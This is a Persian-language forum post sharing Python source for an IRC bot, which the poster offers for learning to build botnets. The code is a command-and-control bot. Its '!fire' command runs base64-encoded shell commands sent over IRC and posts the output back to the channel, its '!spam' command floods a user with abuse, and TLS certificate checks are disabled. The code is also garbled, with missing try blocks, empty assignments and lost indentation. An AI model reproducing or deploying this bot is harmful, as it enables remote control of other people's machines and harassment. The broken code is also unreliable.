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ربات IRC

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  • ربات IRC

    سلام به همه دوستان گل
    تو این تاپیک یه سورس کد از یک بات IRC میزارم که نحوه کار با چنل های ای ار سی رو تو پایتون برای ساخت بات نت و غیر یاد بگیرین
    امیدوارم مفید باشه [img]images/smilies/Smileys/8.gif[/img][img]images/smilies/Smileys/3.gif[/img]

    # simple socket irc bot
    # TurboBorland
    # ssl is pretty slow, normal socket over, likely, port 6667 would be faster
    # if you want normal socket, get rid of try blocks after s=socket.socket, throw an s.connect((host,port)) in it's place
    # finally, replace all sslSocket with s
    import socket, ssl, sys
    from time import sleep
    import threading, os
    import base64 # for command encoding (spaces and other character problems we may have)
    host = '' #ip or hostname
    port = 6697 # ssl port
    master = 'TurboBorland' #who to report to
    nick = 'monstermash'
    ident = 'monstermash'
    realname = 'Indentured Bot'
    channels = ['myplace'] #channels to join on start
    opfile = 'opers' # ACL file name
    # test/create ACL file
    opers =
    f = open(opfile, 'r')
    except IOError, e:
    print('Could not open ACL file %s because:\n%s\n' % (opfile, e))
    yno = raw_input("Would you like to create this file? (y/n)\n")
    if (yno == 'y'):
    opuser = raw_input('Enter username (needs to be identified):\t')
    f = open(opfile, 'w')
    f.write('%s\n' % opuser)
    f = open(opfile, 'r')
    sys.exit("\nCan not operate without oper file. Exiting.\n")
    for line in f:
    # connect to server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sslSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) #no cert validation enabled (cert_reqs=cert_required)
    print repr(sslSocket.getpeername())
    except socket.error, e:
    print '\nAttempting with SSLv3'
    print('\nError message:\t%s' % e)
    sslSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv3)
    print repr(sslSocket.getpeername())
    except e:
    sys.exit('\nDoes not support tlsv1 or sslv3\nExiting.\n')
    except socket.error, e:
    sys.exit('\nError connecting to host. Error:\n%s' % e)
    greet = sslSocket.recv(1024)
    print 'Connecting to server...'
    sleep(10) # increase if slow connection
    print greet
    #association commands
    sslSocket.send('nick %s\r\n' % nick)
    sslSocket.send('user %s %s mooninite :%s\r\n' % (ident, host, realname))
    #handle initial ping
    response = sslSocket.recv(254)
    print('Looking for initial ping request...\n%s' % response)
    if (response.find('PING') != -1):
    response = response.rstrip()
    response = response.split()
    sslSocket.send('PONG %s\r\n' % str(response[1]))
    #join channels
    for channel in channels:
    sslSocket.send('join #%s\r\n' % channel)
    print('Attempted to join channel %s' % channel)
    def auth(identer): # authenticate user. yes, takes one more logic check doing this
    for op in opers:
    sslSocket.send('privmsg nickserv status %s\r\n' % identer)
    ider = sslSocket.recv(124)
    ider = ider.split()
    if ((str(op).rstrip() == identer) and (ider[5] == '3')):
    return 1
    def spam(user): # for threading purposes
    while 1:
    sslSocket.send('privmsg %s FUCK YOU\r\n' % user)
    return 0
    # user commands
    while 1:
    chat = sslSocket.recv(176)
    #print chat, # disabled because constant prints brings down speed of script
    if (chat.find('PING') != -1):
    elif (chat.find('!suicide') != -1):
    print chat,
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':') # calling username
    if (auth(identer)):
    sslSocket.send('quit I\'m on fire!!\r\n')
    sys.exit('\n!suicide given by %s\n' % identer)
    fchannel =
    elif (chat.find('!fire') != -1):
    print chat,
    oflag = 0 # if flag = 0, not enough options given for cmd
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    findcmd = fchannel[2].split()
    if (len(findcmd) == 2):
    oflag = 1
    if ((auth(identer)) and (oflag == 1)):
    findchannel = chat.split()
    if (fchannel[1].find('#') != -1): # check if pm or public
    cmd = os.popen(base64.b64decode(findcmd[1])).read()
    sslSocket.send('privmsg %s %s\r\n' % (findchannel[2], cmd))
    cmd = os.popen(base64.b64decode(findcmd[1])).read()
    sslSocket.send('privmsg %s %s\r\n' % (identer, cmd))
    fchannel =
    findchannel =
    elif (chat.find('!joinall') != -1):
    print chat,
    oflag = 0
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    if (auth(identer)):
    rooms = # for later spammy purposes
    listofchannels = s.recv(6046) # increase if big description/many channels
    findchannels = listofchannels.split()
    for word in findchannels:
    sslSocket.send('join %s\r\n' % word)
    sslSocket.send('privmsg %s Attempted to join %s\r\n' % (master,word))
    fchannel =
    findchannels =
    elif (chat.find('!say') != -1):
    print chat,
    oflag = 0
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    temp = fchannel[2] # only given command and text after
    new = temp.split() # split command and text to say
    if (len(new) >= 3):
    sayit = " ".join(new[2:]).rstrip() # text to say
    oflag = 1
    if ((auth(identer)) and (oflag == 1)):
    findchannel = chat.split()
    if (fchannel[1].find('#') != -1):
    sslSocket.send('privmsg %s %s\r\n' % (findchannel[4], sayit))
    sslSocket.send('privmsg %s %s\r\n' % (new[1], sayit))
    fchannel =
    findchannel =
    new =
    elif (chat.find('!add') != -1):
    print chat,
    oflag = 0
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    command = fchannel[2]
    username = command.split()
    if (len(username) == 2):
    user = username[1]
    oflag = 1
    if ((auth(identer)) and (oflag == 1)):
    findchannel = chat.split()
    f = open(opfile, 'a')
    f.write('%s\n' % user)
    sslSocket.send('privmsg %s %s added to ACL by %s\r\n' % (master, user, identer))
    if (fchannel[1].find('#') != -1):
    sslSocket.send('privmsg %s %s added to ACL\r\n' % (findchannel[2], user))
    elif (master != identer):
    sslSocket.send('privmsg %s %s added to ACL\r\n' % (identer, user))
    opers =
    f = open(opfile, 'r')
    for line in f:
    fchannel =
    findchannel =
    username =
    elif (chat.find('!remove') != -1):
    print chat,
    oflag = 0
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    command = fchannel[2]
    username = command.split()
    if (len(username) == 2):
    user = username[1]
    oflag = 1
    if ((auth(identer)) and (oflag == 1)):
    findchannel = chat.split()
    f = open(opfile, 'w')
    f = open(opfile, 'a')
    for op in opers:
    if (op.rstrip() != user):
    sslSocket.send('privmsg %s %s removed from ACL by %s\r\n' % (master, user, identer))
    if (fchannel[1].find('#') != -1):
    sslSocket.send('privmsg %s %s removed from ACL\r\n' % (findchannel[2], user))
    elif (master != identer):
    sslSocket.send('privmsg %s %s removed from ACL\r\n' % (identer, user))
    opers =
    f = open(opfile, 'r')
    for line in f:
    fchannel =
    username =
    findchannel =
    elif (chat.find('!ops') != -1):
    print chat,
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    if (fchannel[1].find('#') != -1):
    findchannel = chat.split()
    sslSocket.send('privmsg %s Ops:\r\n' % findchannel[2])
    for op in opers:
    sslSocket.send('privmsg %s %s\r\n' % (findchannel[2], op))
    sslSocket.send('privmsg %s Ops:\r\n' % identer)
    for op in opers:
    sslSocket.send('privmsg %s %s\r\n' % (identer, op))
    fchannel =
    findchannel =
    # thread being a bitch and wanting to wait on thread finish ****not done****
    elif (chat.find('!spam') != -1):
    print chat,
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    if (auth(identer)):
    thread = threading.Thread(target=spam(findchannel[4]))
    thread.daemon = True
    elif (chat.find('!nick') != -1):
    print chat,
    oflag = 0
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    findnick = fchannel[2].split()
    if (len(findnick) == 2):
    oflag = 1
    if ((auth(identer)) and (oflag == 1)):
    sslSocket.send('nick %s\r\n' % findnick[1])
    sslSocket.send('user %s %s mooninite :%s\r\n' % (findnick[1], host, realname)) # more can easily changed for more unique change
    fchannel =
    findchannel =
    elif (chat.find('!help') != -1):
    print chat,
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    if (auth(identer)):
    sslSocket.send('privmsg %s Commands:\n|' % identer)
    sslSocket.send('privmsg %s | !suicide - kill bot\r\n' % identer)
    sslSocket.send('privmsg %s | !say - !say \#channel text to send\r\n' % identer)
    sslSocket.send('privmsg %s | !add - add an operator\r\n' % identer)
    sslSocket.send('privmsg %s | !remove - remove an operator\r\n' % identer)
    sslSocket.send('privmsg %s | !ops - list operators\r\n' % identer)
    sslSocket.send('privmsg %s | !spam - spam user\r\n' % identer)
    sslSocket.send('privmsg %s | !joinall - parse list and join all found channels\r\n' % identer)
    sslSocket.send('privmsg %s | !nick - Change bots nickname\r\n' % identer)
    fchannel =
    elif (chat.find('PRIVMSG ' + nick) != -1):
    print chat,
    fchannel = chat.split('!')
    identer = fchannel[0].lstrip(':')
    sslSocket.send('privmsg %s Why the fuck are you messaging me?!\r\n' % identer)
    fchannel =
    [align=center]My Email: [email protected]
    [/align][align=left]mov problems,hell
    sub me,pain
    add me,love
    inc pleasure
    inc adrenaline
    push limits
    call hopeForAbetterTomorrow[/align]
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